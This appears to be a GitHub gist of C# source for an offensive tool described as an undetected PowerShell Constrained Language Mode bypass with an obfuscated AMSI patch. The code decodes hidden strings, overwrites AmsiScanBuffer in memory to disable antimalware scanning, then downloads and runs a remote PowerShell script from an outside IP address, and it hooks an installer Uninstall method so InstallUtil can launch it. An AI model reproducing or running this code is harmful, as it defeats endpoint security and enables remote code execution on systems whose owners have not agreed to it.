Created
August 22, 2022 19:26
-
-
Save mariolima/dbbd61677dad3eb382930dbad6948fa7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Undetected CLM Bypass with obfuscated AMSI patch | |
using System; | |
using System.Management.Automation; | |
using System.Text; | |
using System.Runtime.InteropServices; | |
using System.Management.Automation.Runspaces; | |
using System.Configuration.Install; | |
namespace Bypass { | |
class Program { | |
[DllImport("kernel32")] | |
static extern IntPtr GetProcAddress( | |
IntPtr hModule, | |
string procName); | |
[DllImport("kernel32")] | |
static extern IntPtr LoadLibrary( | |
string name); | |
[DllImport("kernel32")] | |
static extern bool VirtualProtect( | |
IntPtr lpAddress, | |
UIntPtr dwSize, | |
uint flNewProtect, | |
out uint lpflOldProtect); | |
static void Main(string[] args) { | |
foo(); | |
} | |
public static void foo() { | |
byte[] data = Convert.FromBase64String("YW1zaS5kbGw="); | |
string am = Encoding.UTF8.GetString(data); | |
var lib = LoadLibrary(am); | |
data = Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI="); | |
am = Encoding.UTF8.GetString(data); | |
var asb = GetProcAddress(lib, am); | |
var patch = new byte[] { 0xB9, 0x58, 0x01, 0x08, 0x81, 0xC4 }; | |
for(int i = 0; i < patch.Length; i++) { | |
patch[i] = (byte)(((uint)patch[i] - 1)); | |
} | |
_ = VirtualProtect(asb, (UIntPtr)patch.Length, 0x40, out uint oldProtect); | |
Marshal.Copy(patch, 0, asb, patch.Length); | |
_ = VirtualProtect(asb, (UIntPtr)patch.Length, oldProtect, out uint _); | |
String cmd = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.85/foos.ps1')"; | |
Runspace rs = RunspaceFactory.CreateRunspace(); | |
rs.Open(); | |
PowerShell ps = PowerShell.Create(); | |
ps.Runspace = rs; | |
ps.AddScript(cmd); | |
ps.Invoke(); | |
rs.Close(); | |
} | |
} | |
[System.ComponentModel.RunInstaller(true)] | |
public class Sample : System.Configuration.Install.Installer { | |
public override void Uninstall(System.Collections.IDictionary savedState) { | |
base.Uninstall(savedState); | |
Program.foo(); | |
} | |
} | |
} | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment